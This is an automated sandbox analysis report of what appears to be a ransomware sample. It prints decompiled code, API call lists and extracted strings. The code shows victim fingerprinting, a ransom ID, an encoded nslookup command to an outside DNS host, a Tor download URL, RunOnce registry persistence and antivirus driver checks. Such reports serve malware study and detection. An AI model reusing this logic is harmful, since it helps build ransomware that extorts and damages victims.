Part of subcall function 0FBC7330: GetUserNameW.ADVAPI32(00000000,?), ref: 0FBC7368
Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FBC7386
Part of subcall function 0FBC7330: GetComputerNameW.KERNEL32 ref: 0FBC7390
Part of subcall function 0FBC7330: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 0FBC73B0
Part of subcall function 0FBC7330: wsprintfW.USER32 ref: 0FBC73F1
Part of subcall function 0FBC7330: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FBC740E
Part of subcall function 0FBC7330: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FBC7432
Part of subcall function 0FBC7330: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,0FBC4640,?), ref: 0FBC7456
Part of subcall function 0FBC7330: RegCloseKey.ADVAPI32(00000000), ref: 0FBC7472

Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7192
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC719D
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71B3
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71BE
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71D4
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71DF
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC71F5
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(0FBC4966,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7200
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7216
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7221
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7237
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7242
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC7261
Part of subcall function 0FBC7140: lstrlenW.KERNEL32(?,?,?,?,0FBC4649,00000000,?,00000000,00000000,?,00000000), ref: 0FBC726C

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC4151
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC4193
lstrcpyW.KERNEL32 ref: 0FBC4212
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC4219

Strings

o, xrefs: 0FBC42FD
d, xrefs: 0FBC431D
/, xrefs: 0FBC42A5
r, xrefs: 0FBC42ED
j, xrefs: 0FBC42D5
l, xrefs: 0FBC432D
c, xrefs: 0FBC42DD
w, xrefs: 0FBC42AD
t, xrefs: 0FBC4295
h, xrefs: 0FBC428D
h, xrefs: 0FBC4355
a, xrefs: 0FBC4335
d, xrefs: 0FBC4315
-, xrefs: 0FBC433D
/, xrefs: 0FBC42F5
{USERID}, xrefs: 0FBC41EF, 0FBC423D, 0FBC4243
ransom_id=, xrefs: 0FBC4180, 0FBC418C
., xrefs: 0FBC42E5
., xrefs: 0FBC4365
t, xrefs: 0FBC42BD
w, xrefs: 0FBC4325
n, xrefs: 0FBC436D
o, xrefs: 0FBC430D
m, xrefs: 0FBC435D
s, xrefs: 0FBC429D
w, xrefs: 0FBC42B5
r, xrefs: 0FBC42C5
y, xrefs: 0FBC434D
r, xrefs: 0FBC42CD
n, xrefs: 0FBC4305
a, xrefs: 0FBC4345

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
API String ID: 4100118565-2385900546
Opcode ID: 0e6f32a160c31b1f0bc923cb0a24fedcf54b3d431c582effad47f21f24cd5901
Instruction ID: e3f9dd8b582bb904d872799338091093d6d9d4b1c7f9c76658d91c31adb01b0a
Opcode Fuzzy Hash: 0e6f32a160c31b1f0bc923cb0a24fedcf54b3d431c582effad47f21f24cd5901
Instruction Fuzzy Hash: EC710270104340CBE724DF10E82976B7BE2FB80B54F50499CF6845B292EBB99649CFE2

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC4E90 Relevance: 64.9, APIs: 8, Strings: 29, Instructions: 120
pipememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FBC4E90(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				short _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				struct _SECURITY_ATTRIBUTES _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				void* _t57;
				CHAR* _t64;
				void* _t66;

				_v64 = 0x73006e;
				_t57 = __edx;
				_v8 = 0;
				_t64 = __ecx;
				_v68 = 0;
				_v60 = 0x6f006c;
				_t43 =  !=  ?  &_v124 :  &_v64;
				_v56 = 0x6b006f;
				_a4 =  !=  ?  &_v124 :  &_v64;
				_v52 = 0x700075;
				_v48 = 0x250020;
				_v44 = 0x200053;
				_v40 = 0x6e0064;
				_v36 = 0x310073;
				_v32 = 0x73002e;
				_v28 = 0x70006f;
				_v24 = 0x6f0072;
				_v20 = 0x6e0064;
				_v16 = 0x2e0073;
				_v12 = 0x750072;
				_v124 = 0x73006e;
				_v120 = 0x6f006c;
				_v116 = 0x6b006f;
				_v112 = 0x700075;
				_v108 = 0x250020;
				_v104 = 0x200053;
				_v100 = 0x6e0064;
				_v96 = 0x320073;
				_v92 = 0x73002e;
				_v88 = 0x70006f;
				_v84 = 0x6f0072;
				_v80 = 0x6e0064;
				_v76 = 0x2e0073;
				_v72 = 0x750072;
				_v136.nLength = 0xc;
				_v136.bInheritHandle = 1;
				_v136.lpSecurityDescriptor = 0;
				_t45 = CreatePipe(0xfbd2a70, 0xfbd2a6c,  &_v136, 0);
				if(_t45 != 0) {
					_t45 = SetHandleInformation( *0xfbd2a70, 1, 0);
					if(_t45 == 0) {
						goto L1;
					} else {
						CreatePipe(0xfbd2a68, 0xfbd2a74,  &_v136, 0);
						_t45 = SetHandleInformation( *0xfbd2a74, 1, 0);
						if(_t45 == 0) {
							goto L1;
						} else {
							_t66 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t66 == 0) {
								lstrcpyA(_t64, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t66, _a4, _t57);
								E0FBC4C40(_t66);
								E0FBC4DE0(_t57, _t64, _t57, _t64, _t66);
								VirtualFree(_t66, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t45 | 0xffffffff;
				}
			}

APIs

CreatePipe.KERNEL32(0FBD2A70,0FBD2A6C,?,00000000,00000001,00000001,00000000), ref: 0FBC4FA9
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FBC4FCD
CreatePipe.KERNEL32(0FBD2A68,0FBD2A74,0000000C,00000000), ref: 0FBC4FE6
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0FBC4FF6
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0FBC500A
wsprintfW.USER32 ref: 0FBC501B
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC503C

Strings

d, xrefs: 0FBC4F59
l, xrefs: 0FBC4F36
r, xrefs: 0FBC4F28
s, xrefs: 0FBC4F83
., xrefs: 0FBC4F67
S, xrefs: 0FBC4F52
r, xrefs: 0FBC4F75
d, xrefs: 0FBC4F7C
., xrefs: 0FBC4F05
fabian wosar <3, xrefs: 0FBC504B
o, xrefs: 0FBC4F6E
l, xrefs: 0FBC4EBB
o, xrefs: 0FBC4EC5
o, xrefs: 0FBC4F0C
, xrefs: 0FBC4F4B
s, xrefs: 0FBC4EFE
u, xrefs: 0FBC4F44
s, xrefs: 0FBC4F60
n, xrefs: 0FBC4F2F
r, xrefs: 0FBC4F8A
S, xrefs: 0FBC4EF0
d, xrefs: 0FBC4EF7
d, xrefs: 0FBC4F1A
o, xrefs: 0FBC4F3D
u, xrefs: 0FBC4EE2
r, xrefs: 0FBC4F13
n, xrefs: 0FBC4E9D
s, xrefs: 0FBC4F21
, xrefs: 0FBC4EE9

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $ $.$.$S$S$d$d$d$d$fabian wosar <3$l$l$n$n$o$o$o$o$r$r$r$r$s$s$s$s$u$u
API String ID: 1490407255-3453122116
Opcode ID: 2b98eaa12160a2f4629d41a4a145051f0d7177b045bd68bea1891636a197984c
Instruction ID: b0ff72e84b252968df8ad7f8d12322af4288340af4c0860eeff5f65558e10f60
Opcode Fuzzy Hash: 2b98eaa12160a2f4629d41a4a145051f0d7177b045bd68bea1891636a197984c
Instruction Fuzzy Hash: 5F418C70A00308DBEB10CF91E8587EEBFB5FB04759F104169E504AB291C7FA06498F95

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC41D6 Relevance: 61.4, APIs: 5, Strings: 30, Instructions: 104
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0FBC41D6(void* __eax, void* __ebp, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, intOrPtr _a96, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, void* _a128, WCHAR* _a132, char _a136) {
				void* _t41;
				void* _t44;
				WCHAR* _t45;
				signed short _t49;
				signed short* _t50;
				signed int _t55;
				signed int _t56;
				void* _t59;
				WCHAR* _t60;
				WCHAR* _t62;
				void* _t65;

				_t41 = __eax;
				do {
					 *(_t41 + 0xfbd2000) =  *(_t41 + 0xfbd2000) ^ 0x00000005;
					_t41 = _t41 + 1;
				} while (_t41 < 0xa38);
				 *0xfbd2a64 = 0xfbd2000;
				_t60 = E0FBC8090(0xfbd2000, L"{USERID}");
				if(_t60 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t60, _t62);
						_t60[lstrlenW(_t60)] = 0x20;
						_t60 = 0xfbd2000;
						_t49 =  *0xfbd2000; // 0xfeff
						if(_t49 == 0) {
							goto L13;
						}
						_t55 = _t49 & 0x0000ffff;
						_t65 = 0xfbd2000 - L"{USERID}";
						do {
							_t50 = L"{USERID}";
							if(_t55 == 0) {
								goto L12;
							} else {
								while(1) {
									_t56 =  *_t50 & 0x0000ffff;
									if(_t56 == 0) {
										break;
									}
									_t59 = ( *(_t65 + _t50) & 0x0000ffff) - _t56;
									if(_t59 != 0) {
										L11:
										if( *_t50 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t50 =  &(_t50[1]);
										if( *(_t65 + _t50) != _t59) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L13;
								}
								_t62 = _a132;
								goto L4;
							}
							goto L13;
							L12:
							_t7 =  &(_t60[1]); // 0x2d002d
							_t55 =  *_t7 & 0x0000ffff;
							_t60 =  &(_t60[1]);
							_t65 = _t65 + 2;
						} while (_t55 != 0);
						goto L13;
					}
				}
				L13:
				_a8 = 0x740068;
				_a12 = 0x700074;
				_a16 = 0x3a0073;
				_a20 = 0x2f002f;
				_a24 = 0x770077;
				_a28 = 0x2e0077;
				_a32 = 0x6f0074;
				_a36 = 0x700072;
				_a40 = 0x6f0072;
				_a44 = 0x65006a;
				_a48 = 0x740063;
				_a52 = 0x6f002e;
				_a56 = 0x670072;
				_a60 = 0x64002f;
				_a64 = 0x77006f;
				_a68 = 0x6c006e;
				_a72 = 0x61006f;
				_a76 = 0x2f0064;
				_a80 = 0x6f0064;
				_a84 = 0x6e0077;
				_a88 = 0x6f006c;
				_a92 = 0x640061;
				_a96 = 0x65002d;
				_a100 = 0x730061;
				_a104 = 0x2e0079;
				_a108 = 0x740068;
				_a112 = 0x6c006d;
				_a116 = 0x65002e;
				_a120 = 0x6e;
				if( *0xfbd2a44 == 0) {
					_t45 = VirtualAlloc(0, 0x400, 0x3000, 4);
					 *0xfbd2a44 = _t45;
					if(_t45 != 0) {
						wsprintfW(_t45, L"%s",  &_a8);
					}
				}
				VirtualFree(_a128, 0, 0x8000);
				_t44 = E0FBC7C10( &_a136);
				return _t44;
			}

APIs

lstrcpyW.KERNEL32 ref: 0FBC4212
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0FBC4219
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FBC4385
wsprintfW.USER32 ref: 0FBC439F
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FBC43B6

Strings

o, xrefs: 0FBC42FD
d, xrefs: 0FBC431D
/, xrefs: 0FBC42A5
r, xrefs: 0FBC42ED
j, xrefs: 0FBC42D5
l, xrefs: 0FBC432D
c, xrefs: 0FBC42DD
w, xrefs: 0FBC42AD
t, xrefs: 0FBC4295
h, xrefs: 0FBC428D
h, xrefs: 0FBC4355
a, xrefs: 0FBC4335
d, xrefs: 0FBC4315
-, xrefs: 0FBC433D
/, xrefs: 0FBC42F5
{USERID}, xrefs: 0FBC41EF, 0FBC423D, 0FBC4243
., xrefs: 0FBC42E5
., xrefs: 0FBC4365
t, xrefs: 0FBC42BD
w, xrefs: 0FBC4325
n, xrefs: 0FBC436D
o, xrefs: 0FBC430D
m, xrefs: 0FBC435D
s, xrefs: 0FBC429D
w, xrefs: 0FBC42B5
r, xrefs: 0FBC42C5
y, xrefs: 0FBC434D
r, xrefs: 0FBC42CD
n, xrefs: 0FBC4305
a, xrefs: 0FBC4345

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$s$t$t$w$w$w$y${USERID}
API String ID: 4033391921-3341315666
Opcode ID: b44854a722a90996bbee49eaa57804c12c282392746c9d9a603446e2a6e209d9
Instruction ID: 48399852ba262d4261cb1468ecee9f5481d674f5d3fcdf085f05790daf7b4427
Opcode Fuzzy Hash: b44854a722a90996bbee49eaa57804c12c282392746c9d9a603446e2a6e209d9
Instruction Fuzzy Hash: 48418F70104381CBD724DF11E56836BBFE2FB81759F50895CF6884B292D7BA858ACF92

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC2960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FBC2960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0FBC8150( &_v32, lstrlenW( &_v32));
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				if(RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0) != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47);
					asm("sbb esi, esi");
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

APIs

lstrlenW.KERNEL32(00520050,00000041,772D82B0,00000000), ref: 0FBC299D

Part of subcall function 0FBC8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0FBC816D
Part of subcall function 0FBC8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FBC819B
Part of subcall function 0FBC8150: GetModuleHandleA.KERNEL32(?), ref: 0FBC81EF
Part of subcall function 0FBC8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0FBC81FD
Part of subcall function 0FBC8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0FBC820C
Part of subcall function 0FBC8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0FBC8255
Part of subcall function 0FBC8150: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC8263

RegCreateKeyExW.ADVAPI32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0FBC2C45,00000000), ref: 0FBC2A84
lstrlenW.KERNEL32(00000000), ref: 0FBC2A8F
RegSetValueExW.ADVAPI32(0FBC2C45,00520050,00000000,00000001,00000000,00000000), ref: 0FBC2AA4
RegCloseKey.ADVAPI32(0FBC2C45), ref: 0FBC2AB1

Strings

\, xrefs: 0FBC29EB
V, xrefs: 0FBC2A4C
d, xrefs: 0FBC2A22
n, xrefs: 0FBC2A6F
u, xrefs: 0FBC2A37
H, xrefs: 0FBC2993
\, xrefs: 0FBC2A14
F, xrefs: 0FBC29BD
w, xrefs: 0FBC2A29
S, xrefs: 0FBC29B0
s, xrefs: 0FBC2A06
U, xrefs: 0FBC2984
R, xrefs: 0FBC29CE
n, xrefs: 0FBC2A76
i, xrefs: 0FBC2A1B
f, xrefs: 0FBC2A0D
r, xrefs: 0FBC29FF
W, xrefs: 0FBC29C7
r, xrefs: 0FBC2A53
i, xrefs: 0FBC29F8
I, xrefs: 0FBC2979
P, xrefs: 0FBC296D
R, xrefs: 0FBC2A68
n, xrefs: 0FBC2A45
r, xrefs: 0FBC2A3E
A, xrefs: 0FBC298C
n, xrefs: 0FBC2A61
i, xrefs: 0FBC2A5A
\, xrefs: 0FBC2A30
e, xrefs: 0FBC2A7D

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311529128.000000000FBCA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311539070.000000000FBD2000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000019.00000002.311544647.000000000FBD4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_fbc0000_wjaoab.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: daab8f6be5f60a1cb8a143eb4b991243d9d0b3fa7b6705fff03eca339e4fb9fb
Instruction ID: 3312de828c1967ff786b6fe7342ac0a7a923fdd67e763452bc476741ef31c526
Opcode Fuzzy Hash: daab8f6be5f60a1cb8a143eb4b991243d9d0b3fa7b6705fff03eca339e4fb9fb
Instruction Fuzzy Hash: 2E31DBB090021DDFEB20CF91E958BEEBFB9FB05709F108159D5187B281D7BA49498F94

Uniqueness

Uniqueness Score: -1.00%

Function 0FBC2D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0FBC2D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				short _t42;
				void* _t49;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				if(E0FBC2F50( &(_v84.message)) != 0 || E0FBC2F50( &_v96) != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0FBC2C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0FBC2D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) != 0) {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
							}
							goto L15;
						}
						ExitThread(_t71);
					}
					ExitThread();
				} else {
					_v84.message = 0x730066;
					_v84.wParam = 0x660064;
					_v84.lParam = 0x2e0077;
					_v84.time = 0x790073;
					_v84.pt = 0x73;
					if(E0FBC2F50( &(_v84.message)) != 0) {
						L15:
						ExitThread(0);
					}
					_t61 = E0FBC30A0(_t62, _t67, _t69);
					if(_t61 != 0) {
						goto L15;
					}
					_push(_t61);
					E0FBC2AD0();
					goto L5;
				}
			}

APIs

Part of subcall function 0FBC2F50: EnumDeviceDrivers.PSAPI(?,00000004,?), ref: 0FBC2F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0FBC2E19
LoadCursorW.USER32(00000000,00007F00), ref: 0FBC2E2E
LoadIconW.USER32 ref: 0FBC2E59
RegisterClassExW.USER32 ref: 0FBC2E68
ExitThread.KERNEL32 ref: 0FBC2E75

Part of subcall function 0FBC2F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0FBC2F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FBC2E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0FBC2E81
CreateWindowExW.USER32 ref: 0FBC2EA7
SetWindowLongW.USER32 ref: 0FBC2EB4
ExitThread.KERNEL32 ref: 0FBC2EBF

Part of subcall function 0FBC2F50: EnumDeviceDrivers.PSAPI(00000000,00000000,?), ref: 0FBC2FA8
Part of subcall function 0FBC2F50: GetDeviceDriverBaseNameW.PSAPI(00000000,?,00000400), ref: 0FBC2FCF
Part of subcall function 0FBC2F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0FBC2FE3
Part of subcall function 0FBC2F50: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBC2FFA

ExitThread.KERNEL32 ref: 0FBC2F3F

Part of subcall function 0FBC2AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0FBC2AEA
Part of subcall function 0FBC2AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0FBC2B2C
Part of subcall function 0FBC2AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0FBC2B38
Part of subcall function 0FBC2AD0: ExitThread.KERNEL32 ref: 0FBC2C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0FBC2EC8
UpdateWindow.USER32(00000000), ref: 0FBC2ECF
CreateThread.KERNEL32 ref: 0FBC2EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0FBC2EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FBC2F05
TranslateMessage.USER32(?), ref: 0FBC2F1C
DispatchMessageW.USER32 ref: 0FBC2F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0FBC2F37

Strings

s, xrefs: 0FBC2DC1
w, xrefs: 0FBC2DB1
s, xrefs: 0FBC2DB9
f, xrefs: 0FBC2DA1
s, xrefs: 0FBC2D77
s, xrefs: 0FBC2D7F
firefox, xrefs: 0FBC2E9B
win32app, xrefs: 0FBC2E51, 0FBC2EA0
1, xrefs: 0FBC2D6F
d, xrefs: 0FBC2DA9
k, xrefs: 0FBC2D67
0, xrefs: 0FBC2DF1

Memory Dump Source

Source File: 00000019.00000002.311520098.000000000FBC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 0FBC0000, based on PE: true

Associated: 00000019.00000002.311494423.000000000FBC0000.00000002.00000001.01000000.00000006.sdmpDownload File
